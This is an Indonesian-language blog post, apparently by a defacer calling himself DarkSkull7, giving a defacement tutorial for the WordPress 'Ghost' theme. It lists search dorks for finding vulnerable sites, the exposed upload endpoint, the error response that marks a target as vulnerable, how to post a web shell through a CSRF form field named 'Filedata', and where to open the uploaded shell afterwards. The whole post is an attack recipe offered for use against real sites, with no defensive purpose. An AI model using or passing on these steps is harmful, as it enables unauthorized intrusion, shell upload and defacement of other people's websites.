Cara Deface Poc Exploit Themes WordPress Ghost

Oke bg Kali Ini Gua Bakal Ngasih tutorial Deface lagi Untuk Sekarang Metode WordPress Themes Ghost With CSRF ONline

oke langsung aja ke tutornya Coeg!

1) dork:

inurl:/wp-content/themes/Ghost

index of /themes/Ghost

kembangin lagi pake otak wibu lu:v

2) exploit: /wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

3) Vulnerability ~ {"status":"NOK", "ERR":"This file is incorect"}

4) buka csrf ( buka mank ) bisa juga pake csrf online

post di Filedata ~> inget post nya Filedata

5) sukses upload tinggal akses file

cara akses http://target.com/wp-content/uploads/settingsimages/ shell atau script kalian

6) Dan Nanti Seperti Ini

Oke Mungkin Gini aja dulu tutor Deface Kali ini

Btw Gua Nitip Nick Ya:* ./DarkSkull7

DarkSkull7 Blog